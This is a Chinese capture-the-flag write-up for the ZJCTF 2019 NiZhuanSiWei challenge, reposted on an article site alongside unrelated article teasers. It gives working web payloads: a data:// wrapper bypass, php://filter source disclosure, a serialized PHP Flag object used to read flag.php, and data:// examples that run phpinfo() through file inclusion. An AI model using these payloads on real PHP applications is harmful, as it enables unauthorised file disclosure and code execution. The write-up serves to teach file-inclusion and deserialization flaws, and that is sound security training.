文件包含 [ZJCTF 2019]NiZhuanSiWei1

打开题目

代码审计

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){

首先isset函数检查text参数是否存在且不为空

用file_get_contents函数读取text制定的文件内容并与welcome to the zjctf进行强比较

 echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";

如果强比较相等的话,则输出text的内容

if(preg_match("/flag/",$file)){
        echo "Not now!";

如果强比较不相等的话,则检查文件内容是否包含/flag,如果包含,则输出Not now

}else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;

如果文件内容不包含/flag的话,file指定的文件包含到脚本中,这里提示了useless.php,然后对password的值进行反序列化,然后输出password的值

第一步

所以我们需要传入text文件值必须为welcome to the zjctf

1.用php://input协议以post传参的形式写入,

2.用data伪协议写入内容

welcome to the zjctf的base64编码为d2VsY29tZSB0byB0aGUgempjdGY=

payload:

http://127.0.0.1/include.php?file=data://text/plain,welcome to the zjctf
或者

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

传参后页面回显

第二步

我们用php://filter协议读取file下的useless.php的文件内容

这里我们需要注意用php://filter读取的文件内容是被base64加密后的内容

?file=php://filter/convert.base64-encode/resource=useless.php

和第一步的payload拼接一下即得到第二步的payload

payload:

?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

或者

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

页面回显

第三步

将上一步得到的useless.php的文件内容进行base64解码后得到

得到代码

<?php  class Flag{  //flag.php  public $file;  public function __tostring(){  if(isset($this->file)){  echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  
}  
?>

代码审计

class Flag{  //flag.php  
    public $file; 

定义了一个名为Flag的类,然后file参数为公有属性,公共属性$file意味着任何地方都可以访问并修改它。

public function __tostring(){

在类中定义一个 _toString的方法,且设为公有属性,返回字符串信息

if(isset($this->file)){  
            echo file_get_contents($this->file);
            echo "<br>";

如果file的值不为null,输出文件包含下的file值

在第一次的代码审计中,我们需要将password的值进行反序列化操作

那我们可以在在本地搭建网站进行反序列化操作

<?phpclass Flag{  //flag.php  public $file="flag.php";  public function __tostring(){  if(isset($this->file)){  echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  
}  
$a=new Flag();
echo serialize($a);
?>

结果为

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

三步的payload拼接一下即可得到最后的payload

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

或者

?text=data://text/plain,welcome to the zjctf&file=useless.php&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

查看源代码得到flag

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

知识点:
 

  •  
    什么是文件包含漏洞?
     
 

和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行
 

以PHP为例,常用的文件包含函数有以下四种
 

    require():找不到被包含的文件会产生致命错误,并停止脚本运行
    include():找不到被包含的文件只会产生警告,脚本继续执行
    require_once()与require()类似:唯一的区别是如果该文件的代码已经被包含,则不会再次包含
    include_once()与include()类似:唯一的区别是如果该文件的代码已经被包含,则不会再次包含
  
 

  • php伪协议
 

php://filter用于读取源码。
 php://input用于执行php代码。
 

 

  • php isset函数
 

isset() 函数检查变量是否被设置,这意味着它必须被声明并且不为 NULL。
 

 

  • php file_get_contents函数
 

 将整个文件读入一个字符串
 

碰到file_get_contents()就要想到用php://input绕过,因为php伪协议也是可以利用http协议的,即可以使用POST方式传数据。php://input用于执行php代码。
 

 

  • php://input
 

可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。
 

 

  • data://
 

数据流封装器,以传递相应格式的数据。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行
 

          实例用法
 

                  1、data://text/plain,
 http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
  
                    2、data://text/plain;base64,
 http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
 

 

  • php://filter
 

对本地磁盘文件进行读写,php://filter读取php文件时候需要base64编码
 

         实例用法:
 

php://filter/read=convert.base64-encode/resource=[文件名]
 http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
 http://127.0.0.1/include.php?file=php://filter/convert.base64-encode/resource=phpinfo.php
 效果一样的
 

 

  • php类定义 class关键词
 

 

图源:PHP 面向对象 | 菜鸟教程
 

类的基本概念
 

  • 以关键词class开头,后面跟着类名,类名后面跟着一对花括号,里面包含有类的属性、方法的定义。
  • 类名:由字母、数字、下划线组成。字母或下划线开头。
  • 一个类里包含有自己的常量,类的属性(变量),类的方法(函数)。
 

 

  • php public关键词
 

public 关键字是访问修饰符。 它将属性或方法标记为公共。
 

任何可以访问对象的代码都可以使用公共属性和方法。公共属性意味着任何地方都可以访问并修改它。
 

 

  • php  _toString魔术方法
 

__toString()是快速获取对象的字符串信息的便捷方式
 

当我们调试程序时,需要知道是否得出正确的数据。比如打印一个对象时,看看这个对象都有哪些属性,其值是什么,如果类定义了toString方法,就能在测试时,echo打印对象体,对象就会自动调用它所属类定义的toString方法,格式化输出这个对象所包含的数据。使用__toString() 时返回值一定要使用return 来进行返回
 

__toString() 方法用于一个类被当成字符串时应怎样回应
 

而function _tostring 就是在类中定义一个 _toString的方法
 

参考文章;PHP魔术方法之 __toString()-CSDN博客
 

 

 

 

 

 

 

 

知识点选自:
 

【精选】PHP伪协议详解-CSDN博客
 

文件包含漏洞全面详解_caker丶的博客-CSDN博客
 

【精选】文件包含&PHP伪协议利用_file_get_contents()支持的协议-CSDN博客











本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/136931.shtml


如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!











相关文章










单源最短路的简单应用








单源最短路的简单应用




1.dijkstra维护最长路 下面这个是讨论区的一个佬的理解&#xff0c;非常的nice 总结一句话&#xff0c;dijkstra的贪心保证了每次选定的点在之后都不会被其他点所更新了 
同理维护最长路的时候我们发现&#xff0c;如果权值是0-1的话&#xff0c;选定的最大值在之后不会变的更大…




阅读更多...

















5G边缘计算网关的功能及作用








5G边缘计算网关的功能及作用




5G边缘计算网关具有多种功能。 
首先&#xff0c;它支持智能云端控制&#xff0c;可以通过5G/4G/WIFI等无线网络将采集的数据直接上云&#xff0c;实现异地远程监测控制、预警通知、报告推送和设备连接等工作。 
其次&#xff0c;5G边缘计算网关可以采集各种数据&#xff0c;包…




阅读更多...

















只改一个参数让Golang GC耗时暴降到1/30!








只改一个参数让Golang GC耗时暴降到1/30!




&#x1f449;导读 Golang GC 问题的处理网上有比较多的参考文章与教程&#xff0c;本文则聚焦在一次实际业务场景中遇到的问题&#xff0c;并将问题排查处理的全过程详细地做了整理记录&#xff0c;相信对各位 Gopher 有较大参考价值。 &#x1f449;目录 1 问题现象 2 确定原…




阅读更多...

















玄子Share-HTML5知识手册








玄子Share-HTML5知识手册




玄子Share-HTML5知识手册 前言&#xff1a; 这一版 HTML 笔记&#xff0c;算是我写的第四版了&#xff0c;第三版对照课本编写&#xff0c;第四版则是对照 MDN 官方文档编写&#xff0c;不论是术语亦或专业性&#xff0c;都更上一层 文章依托 MDN 文档&#xff0c;拓展了大量课…




阅读更多...

















【论文解读】针对生成任务的多模态图学习








【论文解读】针对生成任务的多模态图学习




一、简要介绍 多模态学习结合了多种数据模式&#xff0c;拓宽了模型可以利用的数据的类型和复杂性&#xff1a;例如&#xff0c;从纯文本到图像映射对。大多数多模态学习算法专注于建模来自两种模式的简单的一对一数据对&#xff0c;如图像-标题对&#xff0c;或音频文本对。然…




阅读更多...

















Node.js |(六)express框架 | 尚硅谷2023版Node.js零基础视频教程








Node.js |(六)express框架 | 尚硅谷2023版Node.js零基础视频教程




学习视频&#xff1a;尚硅谷2023版Node.js零基础视频教程&#xff0c;nodejs新手到高手 文章目录 &#x1f4da;express使用&#x1f407;初体验&#x1f407;express路由⭐️路由的使用⭐️获取请求参数⭐️获取路由参数&#x1f525;练习&#xff1a;根据路由参数响应歌手信息…




阅读更多...

















AJAX 入门笔记








AJAX 入门笔记




课程地址 AJAX  Asynchronous JavaScript and XML&#xff08;异步的 JavaScript 和 XML&#xff09; AJAX 不是新的编程语言&#xff0c;而是一种使用现有标准的新方法 AJAX 最大的优点是在不重新加载整个页面的情况下&#xff0c;可以与服务器交换数据并更新部分网页内容 XML…




阅读更多...

















C++初阶(九)内存管理








C++初阶(九)内存管理




&#x1f4d8;北尘_&#xff1a;个人主页 &#x1f30e;个人专栏:《Linux操作系统》《经典算法试题 》《C》 《数据结构与算法》  ☀️走在路上&#xff0c;不忘来时的初心 文章目录 一、C/C内存分布1、选择题2、填空题3、sizeof 和 strlen 区别&#xff1f;4、总结 二、 C语言…




阅读更多...

















适用于 iOS 的 10 个最佳数据恢复工具分享








适用于 iOS 的 10 个最佳数据恢复工具分享




在当今的数字时代&#xff0c;我们的移动设备占据了我们生活的很大一部分。从令人难忘的照片和视频到重要的文档和消息&#xff0c;我们的 iOS 设备存储了大量我们无法承受丢失的数据。然而&#xff0c;事故时有发生&#xff0c;无论是由于软件故障、无意删除&#xff0c;甚至是…




阅读更多...

















rabbitMq虚拟主机概念








rabbitMq虚拟主机概念




虚拟主机是RabbitMQ中的一种逻辑隔离机制&#xff0c;用于将消息队列、交换机以及其他相关资源进行隔离。 
在RabbitMQ中&#xff0c;交换机&#xff08;Exchange&#xff09;用于接收生产者发送的消息&#xff0c;并根据特定的路由规则将消息分发到相应的队列中。而虚拟主机则…




阅读更多...

















Unity地面交互效果——5、角色足迹的制作








Unity地面交互效果——5、角色足迹的制作




大家好&#xff0c;我是阿赵。   之前几篇文章&#xff0c;已经介绍了地面交互的轨迹做法。包括了法线、曲面细分还有顶点偏移。Shader方面的内容已经说完了&#xff0c;不过之前都是用一个球来模拟轨迹&#xff0c;这次来介绍一下&#xff0c;怎样和角色动作结合&#xff0c…




阅读更多...

















大语言模型(LLM)综述(七):大语言模型设计应用与未来方向








大语言模型(LLM)综述(七):大语言模型设计应用与未来方向




A Survey of Large Language Models 前言8 A PRACTICAL GUIDEBOOK OF PROMPT DESIGN8.1 提示创建8.2 结果与分析 9 APPLICATIONS10 CONCLUSION AND FUTURE DIRECTIONS 前言 
随着人工智能和机器学习领域的迅速发展&#xff0c;语言模型已经从简单的词袋模型&#xff08;Bag-of-…




阅读更多...

















洛谷 Equalize the Remainders








洛谷 Equalize the Remainders




洛谷没提供中文题面&#xff0c;这里大致翻译一下&#xff1a; 可以进行的操作&#xff1a;任选一个数加一。 一共有n个整数&#xff0c;还有一个约数m&#xff0c;n个数都对m进行求余&#xff0c;累计余数的数量&#xff0c;要求每个余数都有n/m个。 对于样例1的输入&#xff…




阅读更多...

















【微软技术栈】C#.NET 正则表达式源生成器








【微软技术栈】C#.NET 正则表达式源生成器




本文内容 
已编译的正则表达式源生成在源生成的文件中何时使用 
正则表达式 (regex) 是一个字符串&#xff0c;它使开发人员能够表达要搜索的模式&#xff0c;使其成为搜索文本和提取结果作为已搜索字符串子集的一种很常见的方法。 在 .NET 中&#xff0c;System.Text.RegularE…




阅读更多...

















支持C#的开源免费、新手友好的数据结构与算法入门教程 - Hello算法








支持C#的开源免费、新手友好的数据结构与算法入门教程 - Hello算法




前言 
前段时间完成了C#经典十大排序算法&#xff08;完结&#xff09;然后有很多小伙伴问想要系统化的学习数据结构和算法&#xff0c;不知道该怎么入门&#xff0c;有无好的教程推荐的。今天给大家推荐一个支持C#的开源免费、新手友好的数据结构与算法入门教程&#xff1a;He…




阅读更多...

















C# wpf 实现任意控件(包括窗口)更多拖动功能








C# wpf 实现任意控件(包括窗口)更多拖动功能




系列文章目录 
第一章 Grid内控件拖动 第二章 Canvas内控件拖动 第三章 任意控件拖动 第四章 窗口拖动 第五章 附加属性实现任意拖动 第六章 拓展更多拖动功能&#xff08;本章&#xff09; 文章目录 系列文章目录前言一、添加的功能1、任意控件MoveTo2、任意控件DragMove3、边…




阅读更多...

















【STM32】STM32的Cube和HAL生态








【STM32】STM32的Cube和HAL生态




1.单片机软件开发的时代变化 
1.单片机的演进过程 (1)第1代&#xff1a;4004、8008、Zilog那个年代&#xff08;大约1980年代之前&#xff09; (2)第2代&#xff1a;51、PIC8/16、AVR那个年代&#xff08;大约2005年前&#xff09; (3)第3代&#xff1a;51、PIC32、Cortex-M0、…




阅读更多...

















解决IDEA使用卡顿的问题








解决IDEA使用卡顿的问题




*问题&#xff1a;使用IDEA的时候卡顿 原因&#xff1a;IDEA默认分配的内存有上限 
**可以查看内存分配情况及使用情况__ 
解决&#xff1a; 
设置JVM的启动参数&#xff1a; 进入idea的安装目录的bin文件夹   
-Xms1024m
-Xmx2048m
-XX:ReservedCodeCacheSize1024m
-XX:UseG1G…




阅读更多...

















IP-guard WebServer RCE漏洞复现








IP-guard WebServer RCE漏洞复现




0x01 产品简介 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件&#xff0c;旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 
0x02 漏洞概述 漏洞成因     在Web应用程序的实现中&#xff0c;参数的处理和验证是确保应用安全的关键环节…




阅读更多...

















springboot中定时任务cron不生效,fixedRate指定间隔失效,只执行一次的问题








springboot中定时任务cron不生效,fixedRate指定间隔失效,只执行一次的问题




在调试计算任务的时候&#xff0c;手动重置任务为初始状态&#xff0c;但是并没有重新开始计算&#xff0c;检查定时任务代码&#xff1a;  从Scheduled(fixedRate  120000)可以看到&#xff0c;应该是间隔120秒执行一次该定时任务&#xff0c;查看后台日志&#xff0c;并没有重…




阅读更多...


















推荐文章












最新文章


















Copyright @ 2022~2023